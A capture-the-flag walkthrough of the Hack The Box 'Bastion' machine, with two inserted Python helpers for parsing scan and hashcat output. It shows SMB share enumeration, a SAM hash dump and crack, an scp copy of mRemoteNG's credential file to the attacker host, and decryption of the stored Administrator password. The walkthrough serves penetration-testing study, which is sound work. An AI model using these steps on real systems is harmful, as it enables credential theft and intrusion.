Bastion
Ports scan
u505@kali:~/HTB/Machines/Bastion$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.134 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-02-22 15:31:23 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 47001/tcp on 10.10.10.134
Discovered open port 135/tcp on 10.10.10.134
Discovered open port 49668/tcp on 10.10.10.134
Discovered open port 49670/tcp on 10.10.10.134
Discovered open port 49667/tcp on 10.10.10.134
Discovered open port 49666/tcp on 10.10.10.134
Discovered open port 49664/tcp on 10.10.10.134
Discovered open port 139/tcp on 10.10.10.134
Discovered open port 22/tcp on 10.10.10.134
Discovered open port 49669/tcp on 10.10.10.134
Discovered open port 49665/tcp on 10.10.10.134
Discovered open port 5985/tcp on 10.10.10.134
Discovered open port 445/tcp on 10.10.10.134
u505@kali:~/HTB/Machines/Bastion$ nmap -sC -sV 10.10.10.134
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 10:31 EST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.039s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m01s, deviation: 34m37s, median: 57s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-02-22T16:32:36+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-02-22T15:32:38
|_  start_date: 2020-02-22T15:15:33

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.12 seconds
Nmap on the missing ports discovered by masscan
u505@kali:~/HTB/Machines/Bastion$ nmap -sC -sV -p 5985,49666,49669,47001,49670,49664,49668,49665,49667 10.10.10.134
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 10:41 EST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.039s latency).

PORT      STATE SERVICE VERSION
5985/tcp  open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc   Microsoft Windows RPC
49665/tcp open  msrpc   Microsoft Windows RPC
49666/tcp open  msrpc   Microsoft Windows RPC
49667/tcp open  msrpc   Microsoft Windows RPC
49668/tcp open  msrpc   Microsoft Windows RPC
49669/tcp open  msrpc   Microsoft Windows RPC
49670/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.71 seconds
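Working out by hand which masscan hits the default nmap run skipped is error-prone, so here is an added Python helper (my own example, not part of the original writeup) that parses masscan's "Discovered open port" lines and nmap's port table, computes the ports the first nmap run did not cover, and builds the -p value for the follow-up scan. The sample text is constructed from the scan output above, plus one made-up 161/udp line so the T:/U: split is exercised; the helper therefore goes slightly beyond the page by handling UDP as well as TCP.

```python
import re

# Constructed sample: the masscan lines from the scan above, plus one made-up
# UDP hit (161/udp) so the T:/U: handling below is exercised.
MASSCAN_OUTPUT = """\
Discovered open port 47001/tcp on 10.10.10.134
Discovered open port 135/tcp on 10.10.10.134
Discovered open port 49668/tcp on 10.10.10.134
Discovered open port 49670/tcp on 10.10.10.134
Discovered open port 49667/tcp on 10.10.10.134
Discovered open port 49666/tcp on 10.10.10.134
Discovered open port 49664/tcp on 10.10.10.134
Discovered open port 139/tcp on 10.10.10.134
Discovered open port 22/tcp on 10.10.10.134
Discovered open port 49669/tcp on 10.10.10.134
Discovered open port 49665/tcp on 10.10.10.134
Discovered open port 5985/tcp on 10.10.10.134
Discovered open port 445/tcp on 10.10.10.134
Discovered open port 161/udp on 10.10.10.134
"""

# Constructed sample: the port table from the default `nmap -sC -sV` run above.
NMAP_OUTPUT = """\
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
"""

MASSCAN_RE = re.compile(r"^Discovered open port (\d+)/(tcp|udp) on (\S+)$")
NMAP_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\b")


def masscan_ports(text, host=None):
    """Return {(proto, port)} reported open by masscan, optionally for one host."""
    found = set()
    for line in text.splitlines():
        m = MASSCAN_RE.match(line.strip())
        if m and (host is None or m.group(3) == host):
            found.add((m.group(2), int(m.group(1))))
    return found


def nmap_ports(text):
    """Return {(proto, port)} listed as open in nmap's normal output."""
    found = set()
    for line in text.splitlines():
        m = NMAP_RE.match(line.strip())
        if m:
            found.add((m.group(2), int(m.group(1))))
    return found


def missing_ports(masscan_text, nmap_text, host=None):
    """Ports masscan saw open that the nmap run did not cover, sorted."""
    return sorted(masscan_ports(masscan_text, host) - nmap_ports(nmap_text))


def nmap_port_spec(ports):
    """Build an nmap -p value such as 'T:5985,47001,U:161' from (proto, port) pairs."""
    tcp = [str(p) for proto, p in sorted(ports) if proto == "tcp"]
    udp = [str(p) for proto, p in sorted(ports) if proto == "udp"]
    parts = []
    if tcp:
        parts.append("T:" + ",".join(tcp))
    if udp:
        parts.append("U:" + ",".join(udp))
    return ",".join(parts)


if __name__ == "__main__":
    missing = missing_ports(MASSCAN_OUTPUT, NMAP_OUTPUT, host="10.10.10.134")
    print("ports to rescan:", missing)
    print("nmap -sC -sV -p", nmap_port_spec(missing))
```

Any U: ports in the generated spec only get scanned if the follow-up nmap run also includes -sU; the TCP part works with the plain -sC -sV invocation used above.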
Port 445
Nmap doesn't discover any share.
u505@kali:~/HTB/Machines/Bastion$ nmap -p 445 --script=smb-enum-shares 10.10.10.134
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-22 10:36 EST
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.039s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 15.69 seconds
Nullinux
This script doesn't provide any useful information either.
u505@kali:~/HTB/Machines/Bastion$ python3 /opt/utils/nullinux/nullinux.py -v bastion.htb
Starting nullinux v5.4.1 | 02-22-2020 10:38
[*] Enumerating Shares for: bastion.htb
    Shares                  Comments
   -------------------------------------------
[-] No Shares Detected
[*] Enumerating Domain Information for: bastion.htb
[-] Could not attain Domain SID
[*] Enumerating querydispinfo for: bastion.htb
[*] Enumerating enumdomusers for: bastion.htb
[*] Enumerating LSA for: bastion.htb
[*] Performing RID Cycling for: bastion.htb
[-] RID Failed: Could not attain Domain SID
[*] Testing bastion.htb for Known Users
[*] Enumerating Group Memberships for: bastion.htb
[*] 0 unique user(s) identified
smbmap
smbmap provides more information.
u505@kali:~/HTB/Machines/Bastion$ smbmap -u anonymous -H 10.10.10.134
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: bastion.htb
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Backups                                                 READ, WRITE
[!] Unable to remove test directory at \\10.10.10.134\Backups\vAmwsJkyfR, please remove manually
        C$                                                      NO ACCESS       Default share
.
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 lsass
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ntsvcs
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 scerpc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-2dc-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 epmapper
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-1c8-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 eventlog
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-35c-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 atsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-3b0-0
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 wkssvc
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 spoolss
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-5e0-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 trkwks
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 W32TIME_ALT
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 openssh-ssh-agent
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 srvsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 vgauth-service
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-590-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-24c-0
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-244-0
IPC$ READ ONLY Remote IPC
smbclient
u505@kali:~/HTB/Machines/Bastion$ smbclient //bastion/Backups
Enter WORKGROUP\u505's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Feb 22 10:43:14 2020
  ..                                  D        0  Sat Feb 22 10:43:14 2020
  nmap-test-file                      A      260  Sat Feb 22 10:37:21 2020
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  vAmwsJkyfR                          D        0  Sat Feb 22 10:43:14 2020
  WindowsImageBackup                  D        0  Fri Feb 22 07:44:02 2019

                7735807 blocks of size 4096. 2763043 blocks available
smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
The note tells us not to transfer the entire backup locally; doing so over the slow link would only DoS ourselves, so we mount the share instead and read only what we need.
u505@kali:~/HTB/Machines/Bastion$ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
u505@kali:~/HTB/Machines/Bastion$ mkdir mountpoint
u505@kali:~/HTB/Machines/Bastion$ sudo mount -t cifs -o username=anonymous //bastion/Backups mountpoint
Password for anonymous@//bastion/Backups: 
Backup of a computer
A full Windows image backup of a computer (L4mpje-PC) is found in the share.
u505@kali:~/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ ls -ltr
total 5330560
-rwxr-xr-x 1 root root 37761024 Feb 22 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 5418299392 Feb 22 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rwxr-xr-x 1 root root 2374620 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
-rwxr-xr-x 1 root root 2894 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rwxr-xr-x 1 root root 1488 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rwxr-xr-x 1 root root 3988 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rwxr-xr-x 1 root root 7110 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rwxr-xr-x 1 root root 3844 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rwxr-xr-x 1 root root 1484 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rwxr-xr-x 1 root root 6542 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rwxr-xr-x 1 root root 1078 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
-rwxr-xr-x 1 root root 1186 Feb 22 2019 BackupSpecs.xml
-rwxr-xr-x 1 root root 8930 Feb 22 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
mount vhd file
u505@kali:~/HTB/Machines/Bastion$ mkdir -p smb/vhd
u505@kali:~/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ guestmount --add "/home/u505/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /home/u505/HTB/Machines/Bastion/smb/vhd -v
u505@kali:~/HTB/Machines/Bastion$ df -h /opt/HTB/Machines/Bastion/smb/vhd
Filesystem Size Used Avail Use% Mounted on
/dev/fuse 15G 7.4G 7.6G 50% /opt/HTB/Machines/Bastion/smb/vhd
Alternative (and faster) way to mount vhd file
u505@kali:~/HTB/Machines/Bastion$ sudo modprobe nbd
[sudo] password for u505:
u505@kali:~/HTB/Machines/Bastion$ sudo qemu-nbd -r -c /dev/nbd0 "/home/u505/HTB/Machines/Bastion/mountpoint/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd"
u505@kali:~/HTB/Machines/Bastion$ sudo mount -r /dev/nbd0p1 smb/vhd/
u505@kali:~/HTB/Machines/Bastion$ df -h /opt/HTB/Machines/Bastion/smb/vhd
Filesystem Size Used Avail Use% Mounted on
/dev/nbd0p1 15G 7.4G 7.6G 50% /opt/HTB/Machines/Bastion/smb/vhd
Copy the SAM and SYSTEM hives from the backup
u505@kali:~/HTB/Machines/Bastion/smb/vhd/Windows/System32/config$ cp SAM SYSTEM ../../../../
u505@kali:~/HTB/Machines/Bastion/smb$ samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
u505@kali:~/HTB/Machines/Bastion/smb$ samdump2 SYSTEM SAM > hash.txt
u505@kali:~/HTB/Machines/Bastion/smb$ hashcat -m 1000 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Bastion/smb$ hashcat -m 1000 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje
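hashcat --show only prints hash:plaintext, so mapping results back to accounts (and spotting the two sentinel hashes, "no LM hash stored" and "blank password") is still manual work. The following Python audit helper is an added example of mine, not part of the original writeup: it parses samdump2's pwdump-style lines, joins them with the hashcat --show output, and reports which enabled accounts have a blank or recovered password. The sample inputs are constructed from the session above.

```python
import re

# Well-known sentinel values in pwdump-style output:
#   LM_EMPTY: no LM hash stored (LM hashing disabled, the modern default)
#   NT_EMPTY: the NT hash of the empty string, i.e. a blank password
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"
NT_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample: the samdump2 output from the session above.
SAMDUMP2_OUTPUT = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""

# Constructed sample: the `hashcat -m 1000 ... --show` output (hash:plaintext).
HASHCAT_SHOW = """\
31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje
"""

PWDUMP_RE = re.compile(
    r"^(?P<flags>(?:\*\w+\*\s+)*)"          # optional markers such as *disabled*
    r"(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_samdump2(text):
    """Parse samdump2/pwdump lines into account dicts; reject malformed lines."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = PWDUMP_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised pwdump line: {line!r}")
        accounts.append({
            "user": m.group("user"),
            "rid": int(m.group("rid")),
            "lm": m.group("lm").lower(),
            "nt": m.group("nt").lower(),
            "disabled": "*disabled*" in m.group("flags"),
        })
    return accounts


def parse_hashcat_show(text):
    """Map NT hash -> recovered plaintext from `hashcat --show` output."""
    cracked = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        h, _, plain = line.partition(":")
        cracked[h.strip().lower()] = plain
    return cracked


def audit(accounts, cracked):
    """Return {username: [findings]} for every account in the dump."""
    report = {}
    for a in accounts:
        findings = []
        if a["nt"] == NT_EMPTY:
            findings.append("blank password")
        elif a["nt"] in cracked:
            findings.append("weak password (cracked: %s)" % cracked[a["nt"]])
        if a["lm"] != LM_EMPTY:
            findings.append("LM hash stored")
        if a["disabled"]:
            findings.append("account disabled")
        report[a["user"]] = findings
    return report


def enabled_at_risk(accounts, cracked):
    """Enabled accounts whose password is blank or was recovered by hashcat."""
    return sorted(
        a["user"] for a in accounts
        if not a["disabled"] and (a["nt"] == NT_EMPTY or a["nt"] in cracked)
    )


if __name__ == "__main__":
    accounts = parse_samdump2(SAMDUMP2_OUTPUT)
    cracked = parse_hashcat_show(HASHCAT_SHOW)
    for user, findings in audit(accounts, cracked).items():
        print(f"{user:<15} {', '.join(findings) or 'ok'}")
    print("enabled accounts at risk:", enabled_at_risk(accounts, cracked))
```

Because the same NT hash maps to the same plaintext, the join also surfaces password reuse across accounts, which a plain hashcat listing hides; here it shows that the two blank-password accounts are disabled and that the only live risk is L4mpje.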
Unmount vhd drive
u505@kali:~/HTB/Machines/Bastion$ sudo umount /opt/HTB/Machines/Bastion/smb/vhd
If the vhd image has been mounted with qemu-nbd, then disconnect it
u505@kali:~/HTB/Machines/Bastion$ sudo qemu-nbd -d /dev/nbd0
/dev/nbd0 disconnected
u505@kali:~/HTB/Machines/SwagShop$ sudo umount /opt/HTB/Machines/Bastion/mountpoint
User flag
u505@kali:~/HTB/Machines/Bastion/smb$ ssh L4mpje@bastion.htb
The authenticity of host 'bastion.htb (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'bastion.htb,10.10.10.134' (ECDSA) to the list of known hosts.
L4mpje@bastion.htb's password: 
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>cd Desktop

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
<USER_FLAG>
mRemoteNG credentials
mRemoteNG stores connection passwords in its configuration file (confCons.xml) under the user's profile. There is a master password, but it is not used to encrypt the stored passwords, so they can be recovered from the file.
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>scp confCons.xml u505@10.10.14.6:/home/u505/HTB/Machines/Bastion/confCons.xml
The authenticity of host '10.10.14.6 (10.10.14.6)' can't be established.
ECDSA key fingerprint is SHA256:ul2yK4MycGHJVeGXwtf6Uts1TELbRlDwqXUxP/9K9m4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.14.6' (ECDSA) to the list of known hosts.
u505@10.10.14.6's password: 
confCons.xml                                  100% 6316   132.2KB/s   00:00
In the configuration file there are two sets of credentials: Administrator and the already known L4mpje.
u505@kali:~/HTB/Machines/Bastion$ python /opt/utils/mRemoteNG-Decrypt/mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
u505@kali:~/HTB/Machines/Bastion$ python /opt/utils/mRemoteNG-Decrypt/mremoteng_decrypt.py -s "yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"
Password: bureaulampje
Root Flag
u505@kali:~/HTB/Machines/Bastion$ ssh administrator@bastion.htb
administrator@bastion.htb's password: 
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>whoami
bastion\administrator

administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
<ROOT_FLAG>
References
- Mounting VHD file on Kali Linux through remote share
- How to mount a Azure’s VHD disk image on Linux
- mRemoteNG: Just Loaded with “Features”
Daniel Simao 10:28, 22 February 2020 (EST)